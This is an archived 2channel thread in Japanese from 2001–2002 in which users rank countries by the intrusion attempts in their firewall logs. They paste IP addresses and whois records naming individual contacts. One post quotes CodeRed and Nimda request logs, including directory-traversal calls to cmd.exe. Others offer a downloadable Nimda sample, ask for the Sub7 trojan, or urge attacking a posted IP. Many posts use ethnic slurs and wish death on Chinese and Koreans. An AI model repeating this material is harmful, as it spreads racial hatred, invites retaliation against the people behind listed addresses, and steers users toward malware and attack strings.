2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

クラックしかけてくる奴の国名ランキング(日本除く)

1 :名無しさん@お腹いっぱい。:01/11/11 23:29
とりあえず
1、中国(あからさまだ...)
2、韓国(ワームが多いな。まぁいいや)
3、米国(なんかランクダウン)

あとどうぞ。

2 :名無しさん@お腹いっぱい。:01/11/11 23:33
台湾

3 :名無しさん@お腹いっぱい。:01/11/11 23:41
語り尽くされたな・・・

4 :エスパー:01/11/12 00:00
中国はおおいよね。追跡はどうすればいいのでしょう?

5 : :01/11/12 00:03
>>4
中国へ行って足で追跡

6 : :01/11/12 00:46
アメリカ台湾はともかく、中国韓国はテロ支援国家だから
しょうがないよな。

7 :金正男:01/11/12 01:13
>中国韓国はテロ支援国家だから
韓国じゃなくて北朝鮮・・・
あっ。同じか。
逝ってきます。
http://www.lycos.co.jp/weather/world/WK003_week.html

8 : :01/11/12 01:23
国民一人が1秒に一回足し算すれば1GHz。そういう国だ。ひとたまり
もない

9 :_:01/11/12 19:44
IPアドレス 193.147.235.51
スペイン?

10 :名無しさん@お腹いっぱい。:01/11/12 20:02
今日の6時頃以上に多くなかったか? 中国と韓国。

11 :名無しさん@お腹いっぱい。:01/11/12 20:11
61.167.116.102
あ〜さっきから中国のやつウザイ

12 :名無しさん@お腹いっぱい。:01/11/12 20:40
.mxドメインからPortmapperやlprを触ってくる奴が最近増えた。

13 :名無しさん@お腹いっぱい。:01/11/12 21:13
ルータ入れるとすっかり静かになるよ。

14 :名無しさん@お腹いっぱい。:01/11/13 07:47
210.152.236.51
あー。。。190回だよ・・
(`×´)丿ウザイ!!

15 :名無しさん@お腹いっぱい。:01/11/13 11:23
今日は韓国から来まくり

16 :名無しさん@お腹いっぱい。:01/11/13 12:14
>>15 今日“も”でしょ(w

17 :名無しさん@お腹いっぱい。:01/11/13 12:20
>>14
a. [IPネットワークアドレス] 210.152.236.0-210.152.239.0
b. [ネットワーク名] YAHOO-NET
f. [組織名] ヤフー株式会社
g. [Organization] Yahoo Japan Corporation
m. [運用責任者] TN025JP
n. [技術連絡担当者] IT018JP
p. [ネームサーバ] dns1.yahoo.co.jp
p. [ネームサーバ] dnsn201.yahoo.co.jp
p. [ネームサーバ] ns.tokyonet.ad.jp
y. [通知アドレス] siteop@mail.yahoo.co.jp
y. [通知アドレス] jpnic-notify@jp.psi.net
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
yahooの鯖がnimdaにでも感染してるのかな?

18 :名無しさん@お腹いっぱい。:01/11/13 18:08
210.172.64.112 から
I've counted 53 connections.
First connection was made to 3619 port at Tue Nov 13 15:05:43 2001
Last connection was made to 3619 port at Tue Nov 13 15:09:01 2001

I've counted 44 connections.
First connection was made to 3867 port at Tue Nov 13 17:17:23 2001
Last connection was made to 3867 port at Tue Nov 13 17:19:28 2001

I've counted 40 connections.
First connection was made to 4092 port at Tue Nov 13 17:58:06 2001
Last connection was made to 4094 port at Tue Nov 13 17:58:39 2001

210.141.108.226 から
I've counted 46 connections.
First connection was made to 3619 port at Tue Nov 13 15:05:43 2001
Last connection was made to 3619 port at Tue Nov 13 15:09:01 2001
新種の warm でも出たのか?

19 :名無しさん@お腹いっぱい。:01/11/14 12:57
今日も韓国から来まくり。ワームかなぁ
中国からきたやつのIPたまたまブラウザに張ってみたら
黒画面に赤字で”Chinse Hacker”とだけ書いてあって萎え。

20 :名無しさん@お腹いっぱい。:01/11/14 16:53
>>18
今日になって明らかに増えてる。眠りから覚めたか?

21 :名無しさん@お腹いっぱい。:01/11/15 01:41
The firewall has blocked Internet access to your computer
(ICMP Echo Request ('Ping')) from 65.174.182.253.

ZoneAlarmのログ見たらこんなの出てきたんですが・・・
Pingって書いてあるけど大丈夫?

22 :名無しさん@お腹いっぱい。:01/11/15 01:53
>>21
pingぐらいだったら大丈夫だよ。ZoneAlarmは警告表示ありに
しておいた方がいいよ。ただし、ポップアップがうざったいけど

23 :名無しさん@お腹いっぱい。:01/11/15 02:06
>>22
ありがとう。安心したよ。
初めてPing来たからビビッタよ。
一日5回くらいしか警告こないから表示ONにするか。

24 :名無しさん@お腹いっぱい。:01/11/15 09:26
1日に10回以上あるのですが
それは普通の数と言えるのでしょうか?

韓国、中国が多いのですが。

25 :名無しさん@お腹いっぱい。:01/11/15 15:47
今日は全然アタークが無くて寂しい

26 :名無しさん@お腹いっぱい。:01/11/15 17:01
韓国はワームしか来ないからいいんだけど中国はなんか頑張ってるねぇ。

27 :名無しさん@お腹いっぱい。:01/11/15 17:41
アタックってどう言う種類があるんですか?
ワーム、トロイぐらいしかわからないんですが・・・
ポートからも侵入できちゃうの?

28 : ◆YLE8z3D6 :01/11/17 03:07
なんで国わかるんですか?

29 :名無しさん@お腹いっぱい。:01/11/17 15:59
>>28
ファイアーウォールのログに残ったIPアドレスを↓とかで検索すればわかる。
http://www.mse.co.jp/ip_domain/

30 :名無しさん@お腹いっぱい。:01/11/17 16:10
CHINANETの連中は他にやること無いのかな?

31 :名無しさん@お腹いっぱい。:01/11/17 16:14
>>30烈しく同感・・・

32 :111:01/11/19 21:52
韓国のLEEさん、ほんと暇なんだなぁ。


MAC:0030BE001823

33 :111:01/11/19 22:00
韓国だからこっちの「李」かな? 笑

34 :名無しさん@お腹いっぱい。:01/11/20 00:54
漏れんとこも韓国からのアタックが一番多い。
韓国ヤフォに攻撃者公開トピ作っちまおうかな?w

35 :名無しさん@お腹いっぱい。:01/11/20 00:59
>>32
ていうかLEEさん乗っ取られてることに気付いてないんじゃない?

36 :名無しさん@お腹いっぱい。:01/11/20 02:17
韓国は糞管理者しかいないからトピ作っても誰もみなさそう。
80以外のポート狙ってるのが問題。オーストラリアから来てたよ...
あとどうでもいいけど福岡市立駐車場の事務室にあるW2000はワームに
やらてるようだな。市立なんだから多少は迷惑lかけないようにしてほしい

37 :名無しさん@お腹いっぱい。:01/11/24 21:34
最近、踏み台利用してなんかしてるのが多いけど
元をたどれば結局、キムチ 

38 :名無しさん@お腹いっぱい。:01/11/24 22:00
61.155.90.92-BEIJING(PEKING)がポート139,445をつついて来るので
試しにブラウザを開いてみたらNIMDAを送ろうとするので有り難くDLしました。
ウイルスチェック実験用に欲しい人はお早めに!(bad→exe)
気にしている人は殆ど対策済みだと思うけど。

http://ftp.sk-kaken.co.jp/readme.bad

39 :名無しさん@お腹いっぱい。:01/11/24 22:33
>>32
うちに来たのもコリアだった。
2ちゃんねるで韓国がボロクソに言われる訳がわかった気がする。

211.226.197.96←逝ってよし!

40 :名無しさん@お腹いっぱい。:01/11/24 23:18
初めて検索してみた。
ほとんどチャイナネットらしい(61.1XX系が多い?)。
本当にウザイ人種だな。

41 : ◆msYbpRzk :01/11/24 23:29
メキシコからFTPされて、
ちょっと嬉しい。

148.244.224.1

42 :名無しさん@お腹いっぱい。:01/11/25 15:14
うざい

221.180.149.227

43 :名無しさん:01/11/25 18:00
たった今211.233.48.127から攻撃されたが、ノートン先生が助けてくれた
役立たずとか思ってたけどありがとうノートン先生。XP用に2002も買うよ
そしてふcこっf211.233.48.127

44 :名無しさん@お腹いっぱい。:01/11/25 18:51
このサイトにサクセスすると、ひたすら113ポートへアクセスしてくる。
http://sv.cmjapan.com/
なんなんだ?

45 :名無しさん@お腹いっぱい。:01/11/25 18:54
        Port 113 identd/auth

identd。接続の "所有者" の識別に使用されます。
ハッカーに多くの情報を漏らします。ポート 113 との間で
大量の接続を開始することで、 SuSE マシンをダウンさせることができます。

46 :名無しさん@お腹いっぱい。:01/11/25 19:08
>>38
ノートン先生の頼もしさを再確認できたよ。

47 :名無しさん@お腹いっぱい。:01/11/25 21:15
中国おおいね

48 : :01/11/25 21:55
ルータ入れれ。ルータも最近は安いぞ。

49 :名無しさん@お腹いっぱい。:01/11/25 23:38
つぶしてみ
IP 211.223.11.232

50 :まる:01/11/25 23:39
日本人。

51 :この板、初めての初心者:01/11/26 01:46
パソコン初めて2年ですがウイルスとかと無縁の生活していました。
もちろん最低限の対策はしていますが・・・
ところが来たんです?先程0時48分に私のPCに侵入を試みようと!!
N、インターネットセキュリティがブロックしてくれて事無きを得ました?
>49 さんのレスのIPでした。(韓国なんですね?)
今後を考えると不安です・・・

52 :名無しさん@お腹いっぱい。:01/11/26 02:04
210 170 99 66 ルータのログで最もしつこいのがこれ。

53 :(-_-;):01/11/26 05:08
カナダ経由のブラジルさんからが多いね
次が中国やね。

54 :名無しさん@お腹いっぱい。:01/11/26 08:33
さっきから、韓国ウゼェ!
韓国はインターネット禁止!
ノートンを入れてなかったころ、散々踏み台にされてたのかなぁ・・。

韓国逝ってよし!

55 :606:01/11/26 11:17
iis狙ってきてるワームの仕業じゃねーの?
サーバでもない君たちのショッパイマシンなんか踏み台にするかよ
大体ブロックしたとか弾いたとか言う前にポート閉じればいいじゃん

56 :名無しさん@お腹いっぱい。:01/11/26 11:24
>>51
ピンポン・ダッシュみたいなもんだから心配しなくていいよ。

57 :にtg:01/11/26 17:43
南鮮、中国うぜいYO!ついでに北鮮も。

58 :名無しさん@お腹いっぱい。:01/11/26 21:50
>>55
@リモートホストにアクセスしてきた。
Aノートンセキュリティの地球儀マークに「!」が点滅した。

Aにはマジ怖かった。
プリインストのマカフィーの頃は大丈夫だったのかと不安になる。

59 :名無しさん@お腹いっぱい。:01/11/26 22:16
なんかAliz騒ぎで一気に厨房度がupしたな。

60 :BADTRANS.B:01/11/27 00:10
BADTRANS.Bの話題。別名とっととSP2にあげろ!

今日 Re: というメールがたくさんきました。
中身は空…と、思ったら?

61 :名無しさん@お腹いっぱい。:01/11/27 01:25
CHINANETまーしつこい。並はずれた根性と執念と暇を感じる。
SONY CORPORATION OF HONG KONG LIMITEDの奴もいた。

62 :名無しさん@お腹いっぱい。:01/11/27 02:35
192.168.0.2からたびたび攻撃を受けます!!!
どこの国だろう、コワヒー(w

63 :63:01/11/27 03:03
>>61
CHINANET
ひろみからDLしてるとこるよね?

64 : :01/11/27 04:58
210.194.161.183

こいつしぬほどウザい
殺してくれ

65 :名無しさん@お腹いっぱい。:01/11/27 08:45
>>63
ひろみから?
んースミマセン分かりません、解説をお願い致します。

66 :名無しさん@お腹いっぱい。:01/11/27 09:57
ダウソ板逝け

67 :606:01/11/28 11:40
>>62
おもしろくないネタだ

68 :名無しさん@お腹いっぱい。:01/11/28 12:00
ローカルアドレスからの攻撃ってあるよ
もっと勉強してね。

69 :名無しさん@お腹いっぱい。:01/11/28 12:04
>>62
多分nimda感染に見せかけた社内クラク/アタ−クだ!

70 :名無しさん@お腹いっぱい。:01/11/28 12:44
http://regland.room.ne.jp/~kairaru//bbs/bbs1/fantasy.cgi

Uha!!

71 :何でか?:01/11/28 17:02
>>62 俺もそうですよ。

調べたらIANA(インターネット資源管理団体の上位組織?)からでした。
何か気持ち悪いです。

72 :名無しさん@お腹いっぱい。:01/11/28 18:47
[203.204.69.202]

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 203.204.0.0 - 203.204.127.255
netname: GIGAMEDIA
descr: Hoshin Gigamedia Center Inc.
descr: Cable-Based ISP in Taiwan.
country: TW
admin-c: HIA1-AP
tech-c: HIA1-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-HOSHIN-TW
changed: hostmaster@apnic.net 20001120
source: APNIC

role: HOSHIN IP Administrators
address: 4F, 57, Tung Hsing Rd.,
address: Taipei, Taiwan
country: TW
phone: +886-2-8768-1566 ext.1069
fax-no: +886-2-8768-2987
e-mail: johnson_liu@corp.giga.net.tw
admin-c: CWT1-AP
tech-c: JC97-AP
tech-c: MC60-AP
tech-c: JL126-AP
tech-c: SL424-AP
tech-c: CL244-AP
tech-c: TC153-AP
tech-c: JC367-AP
nic-hdl: HIA1-AP
notify: johnson_liu@corp.giga.net.tw
mnt-by: MAINT-HOSHIN-TW
changed: hostmaster@apnic.net 20001120
source: APNIC

連続5回侵入を試みようとしたバカ。

73 :名無しさん@お腹いっぱい。:01/11/28 18:48
こんなとこからクラックされました。
202.29.32.194
バンコク内閣情報テクノロジーオフィス

74 :名無しさん@お腹いっぱい。:01/11/28 18:50
211.168.25.101

↑こいつも

75 :名無しさん@お腹いっぱい。:01/11/28 19:16
こんどは連続できた。
フィリピン210.23.100.65と
台北台湾211.22.208.22

76 :名無しさん@お腹いっぱい。:01/11/28 19:27
ニューヨーク66.9.114.226
同朋はアフガンで戦ってるのに、
日本にクラックしとる場合かよ。

77 :名無しさん@お腹いっぱい。:01/11/29 03:32
皆攻撃されとるねえ。

78 :名無しさん@お腹いっぱい。:01/11/29 04:36
IP Address : 210.93.218.0-210.93.218.255
Network Name : SYBER
Connect ISP Name : NETSGO
Connect Date : 20010228
Registration Date : 20010813

[ Organization Information ]
Orgnization ID : ORG223642
Org Name : Cyberrics
State : SEOUL
Address : Room1508, Colonporestel Bldg, 45-13, Yeouido-dong,
Zip Code : 150-010

79 :名無しさん@お腹いっぱい。:01/11/29 04:53
207.71.92.22
さっきから10回以上も。。ハァ
Verio, Inc. (NET-VRIO-207-071-064)
8005 South Chester Street
Englewood, CO 80112
US

80 :名無しさん@お腹いっぱい。:01/11/29 05:24
202.96.75.23

チャンさんです
氏ね

81 :名無しさん@お腹いっぱい。:01/11/29 05:48
今日初めてウイルスバスターのログ見たよ。
毎日攻撃されとるやん、俺(藁

82 :名無し:01/11/29 12:45
うちも中国韓国ばっかり〜

83 :Name_Not_Found:01/11/29 15:46
61.84.195.87
country KR

84 :名無しさん@お腹いっぱい。:01/11/29 21:49
コイツ人のPCに侵入しようとしやがった
メアド書かない

203.141.136.3
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.141.136.0-203.141.139.0
b. [ネットワーク名] INTERLINK
f. [組織名] 株式会社インターリンク
g. [Organization] Interlink Co.,Ltd.
m. [運用責任者] YT107JP
n. [技術連絡担当者] YN3315JP
p. [ネームサーバ] tegtan1.interlink.or.jp
p. [ネームサーバ] tegtan2.interlink.or.jp
y. [通知アドレス] iljpnic@interlink.ad.jp
[割当年月日] 1998/01/12
[返却年月日]
[最終更新] 2001/05/16 13:30:04 (JST)

85 :名無しさん@お腹いっぱい。:01/11/29 23:30
NKってどこかね?

86 :うがが:01/11/29 23:33
  / /    ,,_     ハァハァ
 ━━━━━'), )=         ☆ゴガギーン
      ∧_∧ヽ\         /          / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     (   ) 〉 〉_ _ ____      ∧_∧ ∠  おらっ!出てこい、>>キムチ
     / ⌒ ̄ / "'''"'|    ||     (`∀´ )  \___________
      |   | ̄l    |    |/      /     \
.      |    |  |     |    ||      | |   /\ヽ
       |   |  .|     |    |     へ//|  |  | |
      (   |  .|   ロ|ロ   ゙!l''ヽ/,へ \|_  |   | |
       | .lヽ \ |    |   ヽ\/  \_ / ( )
      | .|  〉 .〉    |    |        | |
     / / / / |     |    〈|      | |
     / / / / |     |    ||      | |
    / /  / / └──┴──┘       | |

87 :名無しさん@お腹いっぱい。:01/11/30 01:14
ウイルスバスターのログってどうやったら見れるの?
自分のもみた〜い!わくわく。

88 :名無しさん@お腹いっぱい。:01/12/01 18:54
オマエラ侵入とかアタックとかって言うけど実際何やられてんの???
ポートスキャンとか言うなよ。
何番のポートにどういう事してきたってログ出せよ。
って、どうせネタスレだからどうでもいいか・・・

89 :(´ー`)y−~~~ :01/12/01 19:14
この手のスレはマターリヲッチです。。。
>>88
#どうせpingだろうけどね。。。

90 :AN HTTPD使用者:01/12/01 23:57
210.113.224.155 - - [27/Sep/2001:16:51:32 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucb
d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 215
CodeRedの痕跡
210.179.120.1 - - [28/Sep/2001:00:49:44 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 234
210.179.120.1 - - [28/Sep/2001:00:49:45 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:46 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:47 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:49 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:50 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:51 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:53 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:53 +0900] "GET /sc?/c+dir HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:54 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:55 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:56 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
210.179.120.1 - - [28/Sep/2001:00:49:57 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 190
210.179.120.1 - - [28/Sep/2001:00:49:58 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
210.179.120.1 - - [28/Sep/2001:00:49:59 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215
某凶悪ウィルス

M$のクソサバじゃなかったからよかったわヽ(`Д´;)ノ

91 :90:01/12/01 23:58
改行ミスごめん

92 :Sub7について誰か教えて :01/12/02 03:58
高性能トロイ「sub7」のダウンロードサイトとツールの使用法を教えてください。

93 :名無しさん@お腹いっぱい。 :01/12/02 05:58
早朝からウザイ

IP: 211.107.30.150
NetBIOS: WORKGROUP 
Node: LEEIKSEUNG
Group: WORKGROUP
MAC: 444553547777
DNS: LEEIKSEUNG

94 :名無しさん@お腹いっぱい。:01/12/02 06:53
>>92
そんなものを欲しがらないで下さい
つかugサイトに逝けば腐るほどあるだろうが

95 :dal(ダル)愛好家:01/12/02 23:53
IP: 210.253.85.248
DNS: oska6640.ppp.infoweb.ne.jp

2回きたんだ どうかたつけようか検討中
参加者募る レスまってるじぇ

96 :名無しさん@お腹いっぱい。:01/12/03 00:09
>>95
どんなのが2回着た?ログ貼れ

97 :名無しさん@お腹いっぱい。:01/12/03 06:14
207.71.92.221
ここから200回くらいアタックを受けてるんですけど、
何者なんでしょう?
verio.netっていうところなんですけど・・・?

98 :名無しさん@お腹いっぱい。:01/12/03 11:12
きっと友達になりたいんだよ。
ほほえましいじゃないか。
ちなみに私は一日761回アタック受けたことあるよ。

99 :名無しさん@お腹いっぱい。:01/12/03 12:38
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

inetnum: 61.158.34.224 - 61.158.34.255
netname: SANLIAN-NETBAR
descr: San lian netbar
country: CN
admin-c: CX58-AP
tech-c: CX58-AP
mnt-by: MAINT-CHINANET-HL
changed: chexs@public.hr.hl.cn 20001229
source: APNIC

person: CHE XUESONG
address: HEILONGJIANG Province liu chuansen
country: CN
phone: +86-0451-5630553
fax-no: +86-0451-5630553
e-mail: chexs@public.hr.hl.cn
nic-hdl: CX58-AP
mnt-by: MAINT-CHINANET-HL
changed: chexs@public.hr.hl.cn 20000804
source: APNIC

未使用ポートブロックに通信してくるのですが
これはなんですか?

100 :名無しさん@お腹いっぱい。 :01/12/03 14:59
今日12件目

inetnum: 210.178.0.0 - 210.183.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR
admin-c: HM127-AP
tech-c: HM127-AP
remarks: ******************************************
remarks: KRNIC is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the KRNIC Whois DB
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: APNIC-HM
mnt-lower: MNT-KRNIC-AP
changed: hostmaster@apnic.net 19981124
changed: hostmaster@apnic.net 20010606
source: APNIC

person: Host Master
address: Korea Network Information Center
address: Narajongkeum B/D 14F, 1328-3, Seocho-dong, Seocho-ku, Seoul, 137-070, Republic of Korea
country: KR
phone: +82-2-2186-4500
fax-no: +82-2-2186-4496
e-mail: hostmaster@nic.or.kr
nic-hdl: HM127-AP
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20010514
source: APNIC

101 :デボン・シャイアー:01/12/03 19:40
みんなよかったね

102 :名無しさん@お腹いっぱい。:01/12/18 18:32
NetBusやBackdoor/SubSevenは韓国からくる事が多いね。
中国からは515のポートを叩く事が多い、なんだろうね?

103 :っy:01/12/18 18:51
///////////////////

■ 全国のハッカー&荒らし集合!! ■




http://kgy999.ath.cx/cgi-bin/1/2.cgi
史上最悪のUG掲示板

/////////////////////

104 :うちもループしてま:01/12/19 06:47
smtpポートにアタックしてくるのは「アタック25」というのか?

105 :名無しさん@お腹いっぱい。:01/12/19 07:05
210.78.138.110
proxy、socks、radacct、3128ポートに連続アタック

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

inetnum: 210.78.128.0 - 210.78.159.255
netname: NET263
descr: 263 network group company in china
country: CN
admin-c: ZH97-AP
tech-c: LY261-AP
mnt-by: MAINT-CN-263
changed: noc@net263.com 20010214
changed: apnic-dbm@apnic.net 20010730
source: APNIC

最後の3128ポートって何だ?

106 :名無しさん@お腹いっぱい。:01/12/19 13:58
1、中国
2、韓国
3、同じプロバイダの奴(日本)
CATVなんですけど、やっぱり報告したほうが良いんでしょうか

107 :名無しさん@お腹いっぱい。:01/12/19 14:33
>>105 squid

108 :名無しさん@お腹いっぱい。:01/12/19 14:45
>>106
1〜1024 ウェルノーソポート
1025〜5000 短命ポート
5001〜65535 お好きにめすままポート

109 : ◆QwRPN9a6 :01/12/20 15:48
Goner virus
http://tokyo.cool.ne.jp/blackhat

110 :名無しさん@お腹いっぱい。:01/12/20 15:56
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 211.149.0.0 - 211.149.255.255
netname: GFCN
descr: Beijing Gold First China System Engineer Co., Ltd
descr: NO.1 Shijiefang Jiuxianqiao Chaoyang District, Beijing
country: CN
admin-c: JH30-AP
tech-c: JH30-AP
mnt-by: MAINT-CNNIC-AP
changed: ipas@cnnic.net.cn20010726 20010726
source: APNIC

person: jiang haifeng
address: Beijing Gold First China System Engineer Co.,Ltdアアセゥスコケヘマオヘウケ、ウフモミマ゙ケォヒセ
country: CN
phone: +86-10-64201234-1033
fax-no: +86-10-64201234-2000
e-mail: jianghaifeng@sina.com
nic-hdl: JH30-AP
mnt-by: MAINT-CNNIC-AP
changed: ipas@cnnic.net.cn 20010220
source: APNIC

111 :Chinanetやばすぎ:01/12/22 17:50
61.182.175.246

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

inetnum: 61.182.0.0 - 61.182.255.255
netname: CHINANET-HE
descr: CHINANET Hebei province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: DK26-AP
tech-c: ZC24-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-HE
changed: hostmaster@ns.chinanet.cn.net 20010216
source: APNIC

person: Dongmei Kou
address: A12,Xin-Jie-Kou-Wai Street,
address: Beijing,100088
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: chunguangcanlanxiaobajie@sina.com
nic-hdl: DK26-AP
mnt-by: MAINT-NEW
changed: chunguangcanlanxiaobajie@sina.com 20010405
source: APNIC

person: zhiyong chen
address: hebei province shijiazhuang
address: fanxi road No.19
address: hebei shuju tongxin ju
country: CN
phone: +86-311-6051394
fax-no: +86-311-6672895
e-mail: jixin@sj-user.he.cninfo.net
nic-hdl: ZC24-AP
mnt-by: MAINT-CHINANET-HE
changed: chenzhy@public.sj.he.cn 20010212
source: APNIC


ついにDOSアタックまで仕掛けてきたよ、こいつ。

112 :名無しさん@お腹いっぱい。:01/12/28 01:53
「Default Block Backdoor/SubSeven Trojan」が mr,27374 をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは mr,27374
リモートアドレス、 サービスは 210.107.123.139,2002

113 :名無しさん@お腹いっぱい。:01/12/28 03:16
a. [IPネットワークアドレス] 211.133.251.0
b. [ネットワーク名] AT-LINKNET
f. [組織名] 株式会社リンク・コミュニカティブ・アドクリエイターズ
g. [Organization] Link, Incorporated
m. [運用責任者] GO004JP
n. [技術連絡担当者] YI1082JP
p. [ネームサーバ] databook.atworks.co.jp
p. [ネームサーバ] ns.idc.ad.jp
y. [通知アドレス] jpnic-db@idc.ad.jp
[割当年月日] 2000/11/23
[返却年月日]
[最終更新] 2000/11/24 10:22:10 (JST)
ip-alloc@nic.ad.jp

うぜーーー

114 :名無しさん@お腹いっぱい。:01/12/28 03:26
(ICMP Echo Request ('Ping')) from 24.167.41.208.
(ICMP Echo Request ('Ping')) from 64.214.236.17.
(ICMP Echo Request ('Ping')) from 165.121.24.75.
(ICMP Echo Request ('Ping')) from 24.226.51.78.
(ICMP Echo Request ('Ping')) from 205.218.104.57.
(ICMP Echo Request ('Ping')) from 205.218.104.57.

やばい・・・
パケット偽装できる人にケンカを売った覚えないのに・・(p_q)

115 :名無しさん@お腹いっぱい。:02/02/13 12:49
お前らアホかと

116 : ◆DAQgnNKg :02/02/13 16:11
http://freebbs.fargaia.com/html/code1216.html

117 :名無しさん@お腹いっぱい。:02/02/18 22:02
すみません、PCに侵入されてるのって、どうやったら判るんですか?

118 :cheshire-cat:02/02/18 22:08
>>117
netstat -an

119 :名無しさん@お腹いっぱい。:02/02/18 23:20
>>117
侵入っていうかピンポンダッシュに近いかと・・。
ttp://members.tripod.co.jp/eazyfox/top.html
ここでお勉強してください。

120 :名無しさん@お腹いっぱい。:02/02/18 23:24
そういや、ユニバーサルスタジオのHPクラックされてたよ。
http://www.universalstudioshollywood.com

121 :名無しさん@お腹いっぱい。:02/03/08 18:10
192.168.1.1うざい!

122 :名無しさん@お腹いっぱい。:02/03/08 18:14
61.141.205.162
中国ってマジウザイ国だね、皆頃しにしたい。

123 :名無しさん@お腹いっぱい。:02/03/08 18:16
皆頃氏にしてください!

124 :名無しさん@お腹いっぱい。:02/03/08 18:16
街宣右翼はチョンの偽装が多い 竹下を脅した日本皇民党の幹部もチョン
http://www.melma.com/mag/00/m00011300/a00000119.html
―スポニチメール―
■No.550  ■2000-10-07
【<社会>「ミスチルのチケット用意しろ」】
 Mr.Childrenのコンサートチケットを脅し取ろうとしたとして、警視庁赤坂署
は恐喝未遂の疑いで右翼団体「日本皇民党」行動隊長、高鐘守容疑者(36)=大
阪市北区=を逮捕した。東京都港区にあるミスチルの所属事務所に押しかけ
「チケットを用意しないと、大変なことになるぞ」と脅迫していた。日本皇民
党は1987年の自民党総裁選前に故竹下登首相への「ほめ殺し」の街頭宣伝など
で知られている。

125 :名無しさん@お腹いっぱい。:02/03/09 13:33
192.168.1.1うざい!smurf攻撃してきやがる!

 

126 :cheshire-cat:02/03/09 13:54
>>125
192.168.000.000 -192.168.255.255 サブネットマスク255.255.255.0
これってクラスCの推奨プライベートIPアドレス。


127 :cheshire-cat:02/03/09 14:05
あ、個人ならルーターの設定不良だろうけど。
お役所とか企業ならアリかもしれない。

128 :  :02/03/09 14:33
61.38.114.103
氏ね

129 :名無しさん@お腹いっぱい。:02/03/09 14:59
>125 (激藁

130 :名無しさん@お腹いっぱい。:02/03/09 16:15
>>121,>>125(プ

131 :名無しさん@お腹いっぱい。:02/03/09 16:18
61.171.91.155
ODAうち切れ
とか言ってみる

132 :名無しさん@お腹いっぱい。:02/03/09 16:28

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 61.132.1.224 - 61.132.1.239
netname: LIANYUNGANG-SUPERVISION-INSTITUTE
descr: LIANYUNGANG Technology Supervision Information Research Institute
country: CN
admin-c: XHJ1-AP
tech-c: XHJ1-AP
mnt-by: MAINT-CHINANET-JS
changed: mhy@jsinfo.net 20010207
source: APNIC

person: Xia Hong Jian
address: No.60, haichang road, lianyungang
country: CN
phone: +86-518-5405727
fax-no: +86-518-5510393
e-mail: pearl.m@ptt.js.cn
nic-hdl: XHJ1-AP
mnt-by: MAINT-CHINANET-JS
changed: pearl.m@ptt.js.cn 20000307
source: APNIC



133 :cheshire-cat:02/03/09 16:45
ブラウジングを装ってどっかを攻撃するなら、ローカルIPアドレスもアリのような気も。

134 :cheshire-cat:02/03/09 16:47
